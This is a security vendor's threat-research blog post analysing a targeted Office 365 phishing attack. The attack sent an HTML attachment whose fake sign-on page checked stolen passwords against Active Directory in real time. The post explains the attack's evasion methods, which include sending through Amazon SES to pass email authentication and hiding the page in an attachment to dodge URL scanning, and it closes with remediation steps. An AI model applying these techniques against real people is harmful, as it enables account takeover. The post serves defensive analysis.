Blox Tales #15: Credential Phishing Attack Performs Real-Time Active Directory (AD) Authentication
We’re breaking from tradition in this Blox Tale and taking a deeper dive into an advanced credential phishing attack with the Armorblox Threat Research Team. They will pry their eyes away from 6 computer screens each (we counted) to walk us through an Office 365 credential phishing attack that uses real-time validation against the target organization’s active directory. Take it away, team!
Recent times haven’t been easy for proponents of globalization, what with countries retreating behind trade barriers and national borders. Hackers on the internet appear to be facing no such crosswinds, however. Our threat research team finds they are going strong as always, availing the use of cross-national cloud service providers in their pursuits - in this case, providers like Amazon (Simple Email Service) and Microsoft (Active Directory, Office 365 APIs).
Today, we take a peek behind the curtain of a credential phishing attack targeting an executive at an American brand named among the Top 50 most innovative companies in the world in 2019. Here’s an overview of the attack flow:
Fig: A summary of the credential phishing attack
Here’s the fictional setting of this phishing incident for the purposes of this blog.
- Affected User: Millton Waddams, senior executive at Acme Corporation Ltd.
- His public email address: email@example.com
- Username for his everyday Active Directory Login: firstname.lastname@example.org
- Acme Corporation is a division of the parent company.
Note that the domain used in his public address email (acmecorp.com) is different from the domain name (acmecompany.com) used in his Active Directory login. His public email address reflects a recent rebranding exercise but his Active Directory address remains the older one.
Milton receives an email at the end of his business work week on a Friday evening just before 6pm. Many employees are likely to have their guard down at the end of their work week.
This email from “ACH Outward@acmecompany.com”, sender address “email@example.com” and with the subject “ACH Debit report” has been crafted to catch his eye and on first sight appears to be an internal financial report of sorts.
Fig: Header for the credential phishing email
The emall simply reads: “Find enclosed Payment Remittance Report’ as of 7/11/2020 2:53:14 a.m. Thank you for your business!”. The email also contains an attachment with filename “ACH Milton AcmeCorp” that looks like a text file.
Fig: Body of the credential phishing email (Armorblox detection highlights included)
Armorblox’s Inbound Email Protection is active on the enterprise’s email platform. Armorblox’s platform inspects the email and finds an attachment with HTML content. The attachment is rendered using a headless browser and an image of the webpage is extracted.
Armorblox’s solution uses machine learning models to compare the webpage against common sign on pages at popular internet portals. In this case, the web page is found to resemble the Office 365 sign on page. The email is quarantined out of the user’s mailbox.
Armorblox’s security dashboard alerts the security administrator about this credential phishing incident. Armorblox’s Threat Research Team kicks in to find the provenance and severity of the attack.
Opening the attachment from Office 365 in a browser shows a website identical to the Office 365 sign on page. The username has been pre-entered. A non-standard message “Because you’re accessing sensitive info, you need to verify your password” is noted.
Fig: Attachment opens into webpage resembling the Office 365 sign on page
Further investigation reveals the following:
- The email has been sent from amazonses.com, the Amazon Simple Email Service. The DKIM and SPF checks have passed - i.e. the sender IP address matches amazonses.com.
- The sender domain (j.q.zehfsje.com) is found not to be a valid domain. SPF alignment check has not been enabled.
- The phishing email appears to be generated via a customizable toolkit.
- The toolkit appears to be well written code and has code comments that tell you how to customize to a specific target.
- The script code contains Malay language words, which points to a possible Indonesian connection.
- The source code mentions Milton’s username, and the webpage automatically displays his Active Directory credential, which is different from his current public email address.
- The credentials entered on the sign on page are being actively validated real-time against the enterprise’s Active Directory using Office 365 APIs.
- Azure Active Directory sign on logs show an immediate sign on attempt corresponding to XHR requests performed on the attachment webpage.
- If authentication is successful, the user is redirected to zoom.com.
- If authentication fails, the user is redirected to login.microsoftonline.com. This could be a way to hide the phishing attack as just another failed sign on attempt at the Office 365 portal.
- If the entered password text is empty or too short, the user is forced to retry.
Our threat researchers verified the real-time nature of the site by updating the script with a test login and a dummy password and saw a failed login attempt from Provo, Utah in the Azure Active Directory Sign-In portal. As expected, the IP address (220.127.116.11) that attempted the sign-in is the same endpoint the phishing script sends the credentials.
Fig: Evidence of failed login attempt
Infrastructure Behind The Attack
The attacker uses Amazon Simple Email Service to send phishing emails.
The web service behind the credential phishing page is hosted on teenagemoglen[.]com. The domain has been registered at Alibaba.com with a Singapore domain registrar since the end of May 2020. The website is hosted by UnifiedLayer, a hosting company based out of India, at a datacenter in Provo, Utah, United States. The website appears to host web pages copied from another website. None of the links which allow for active engagement with a visitor appear to be active.
Fig: The ‘teenagemolgen[.]com’ domain points to a website that appears unrelated, harmless, and/or copied over
The hosting server itself does not appear to be battened down. This may be to allow for plausible deniability.
Fig: The hosting server itself does not appear to be battened down
The hosting history of teenagemoglen[.]com shows sparse but consistent activity since May 2020; the domain is now on its third hosting provider. Possible mal-activity complaints to hosting providers is forcing the attacker to move between small hosting providers who are less sensitive to complaints and are less plugged into the network security community.
Global nature of the attacker
The attacker has customized a Malay language toolkit to attack an executive based in Southwest United States using a domain registered in Singapore that’s hosted in the northwest United States by a hosting company based out of India. Someone might want to buy movie rights for ‘Around the World in Eighty Phish’.
The use of cloud services
Amazon SES is used to avoid DKIM/SPF failures, circumvent spam filters and add an air of reputability to the email.
Credentials entered on the phishing webpage are being authenticated against Office 365 APIs in real-time to verify the password. This immediate feedback allows the attacker to respond intelligently during the attack. The attacker is also immediately aware of a live compromised credential and allows him to potentially ingratiate himself into the compromised account before any remediation.
Remediation will need to be thorough after such a compromise. A not-comprehensive list of activity that will need to be verified:
- Outbound emails post-compromise
- Email account configurations (such as auto-forwarding)
- Activity at all Office 365 properties including OneDrive, etc.
- Any third-party apps in the Office 365 ecosystem that have been granted access
Bypassing Secure Email Gateway solutions
Commonly deployed Secure Email Gateway (SEG) solutions perform some validation of URL links in email messages. This is commonly done by visiting URLs at the time of email ingress to check the hosted content and by rewriting URLs to route link traffic through a web proxy. The web proxy controls any malicious payload that may be sent to the protected user.
By encoding the malicious payload in an attachment, the attacker has evaded typical URL protection afforded by SEGs.
Targeted nature of attack
The attacker is apparently aware that Acme Corporation is still using acmecompany.com for internal Active Directory authentication and has not switched to acmecorp.com yet. This is likely not common knowledge.
The limited activity at the website hosting the phishing attack and the careful timing of the email to a Friday evening also suggests this is a carefully crafted attack specifically targeted at Milton inside the organization.
Our estimates show there have been 120 odd visits to this website globally since the beginning of June. The sparse number shows that the phishing scams are likely targeted and not spray and pray.
Never a dull moment at the Armorblox Threat Research team. Even on Friday evenings.